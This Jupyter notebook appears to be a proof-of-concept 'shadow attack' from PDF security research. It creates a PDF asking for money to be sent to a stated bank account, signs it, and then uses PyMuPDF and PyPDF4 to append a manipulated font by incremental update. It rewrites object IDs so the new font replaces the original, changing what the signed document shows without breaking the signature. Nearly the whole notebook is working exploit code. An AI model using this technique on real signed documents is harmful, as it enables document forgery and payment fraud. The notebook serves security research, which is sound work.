# Step 0: Configuration Parameters

In [ ]:
folder_path                     = "./../../../shadow-demo-exploits/replace/variant-2_replace-via-overwrite/"
signer_path                     = "./../../../resources/pdf-signer/"
original_font_file              = "./../../../resources/fonts/original-times new-roman/times.ttf"
malicious_font_file             = "./../../../resources/fonts/times-new-roman-manipulated.ttf"

input_file                      = "1_original-document.pdf"
shadowed_file                   = "2_original-document-shadowed.pdf"
shadowed_file_signed            = "3_original-document-shadowed-signed.pdf"
shadowed_file_signed_manipulated= "4_original-document-shadowed-signed-manipulated.pdf"

original_content                = "Please send the money to the following account: US90 5628 3174 5628 3174" 
arrayObj = []

# Step 0.1: Create default PDF if no PDF file is provided as input

In [ ]:
import fitz

input_file = "1_original-document.pdf"
doc = fitz.open()                      # new empty PDF
doc.insertPage(0)                      # creates an ISO-A4 portrait page
page = doc[-1]                         # this is the page
page.insertText(fitz.Point(72, 72),original_content,fontname="tiro", fontsize = 14)
doc.save(folder_path+input_file)

# Step 1: Create the shadow document with included Font

In [ ]:
import fitz

doc = fitz.open()                      # new empty PDF
doc.insertPage(0)                      # creates an ISO-A4 portrait page
page = doc[-1]                         # this is the page
page.insertText(fitz.Point(72, 72),original_content,fontname="F0", fontsize = 14,  fontfile=original_font_file)
doc.save(folder_path+shadowed_file)

# Step 2: Sign the document

In [ ]:
os.system('java -jar '+signer_path+'pdfsigner.jar -i '+folder_path+shadowed_file+' -o '+folder_path+shadowed_file_signed+' -pkcs '+signer_path+'demo-rsa2048.p12 -password demo-rsa2048 -sigtype approval -sigview visible -sigimg '+signer_path+'PdfInsecurityTeam-Logo.png')

# Step 3: Manipulate the signed document

In [ ]:
import PyPDF4 as pyPDF
import shutil

def diff(first, second):
    second = set(second)
    return [item for item in first if item not in second]

def replacePagesID (originalObjId, newObjId, filename):
    #read input file
    fin = open(filename, "rb")
    #read file contents to string
    data = fin.read()
    paddingStr = " "* ((len(str(originalObjId)))-(len(str(newObjId)))-1)
    #replace all occurrences of the required string
    data = data.replace(b"\n"+bytes(f"{originalObjId}","utf-8")+b" 0 obj\n", b"\n"+bytes(f"{newObjId}","utf-8")+b" 0 obj"+bytes(f"{paddingStr}","utf-8")+ b"\n")
    fin.close()
    fin = open(filename, "wb")
    fin.write(data)
    fin.close()

def findInDict(needle,haystack):
    if isinstance(haystack, pyPDF.generic.IndirectObject):
        haystack = haystack.getObject()

    for key,val in haystack.items():
        try:
            value = haystack[key]
            # print(key+":"+value)
        except:
            pass
        if key == needle:
            if val in arrayObj:
                return val
            else:
                arrayObj.append(val)
        if isinstance(value,pyPDF.generic.DictionaryObject):
            x = findInDict(needle,value)
            if x is not None:
                return x
        elif isinstance(value,pyPDF.generic.IndirectObject):
            x = findInDict(needle,value.getObject())
            return x
        elif isinstance(value,pyPDF.generic.ArrayObject):
            for i in list(value):
                if isinstance(i,pyPDF.generic.DictionaryObject) or isinstance(i,pyPDF.generic.IndirectObject):
                    x = findInDict(needle,i)
                    return x

# Step 1: Create a copy of the document which will be manipulated
shutil.copyfile(folder_path+shadowed_file_signed, folder_path+shadowed_file_signed_manipulated)

# Step 2: Open the document which will be manipulated
doc = fitz.open(folder_path+shadowed_file_signed_manipulated)

# Step 3: Find all fonts, which will be overwritten
original_font_list = []
new_font_list = []
for f in doc.getPageFontList(0, full=False): 
    original_font_list.append(f[0])

# Step 4: Append the malicious font to the file and save the file
for page in doc:
    page.insertFont(fontname='F1', set_simple=False, fontfile=folder_path+malicious_font_file)
doc.saveIncr()

# Step 5: Open the manipulated document and adapt the Object ID of the malicious font to ovverwride the previous one
doc = fitz.open(folder_path+shadowed_file_signed_manipulated)
for f in doc.getPageFontList(0, full=False): 
    new_font_list.append(f[0])

pdf_reader = pyPDF.PdfFileReader(open(folder_path+shadowed_file_signed_manipulated, mode="rb"))
list(pdf_reader.pages)

answer = findInDict('/FontFile2',pdf_reader.getPage(0))
replacePagesID(arrayObj[1].idnum, arrayObj[0].idnum,folder_path+shadowed_file_signed_manipulated)
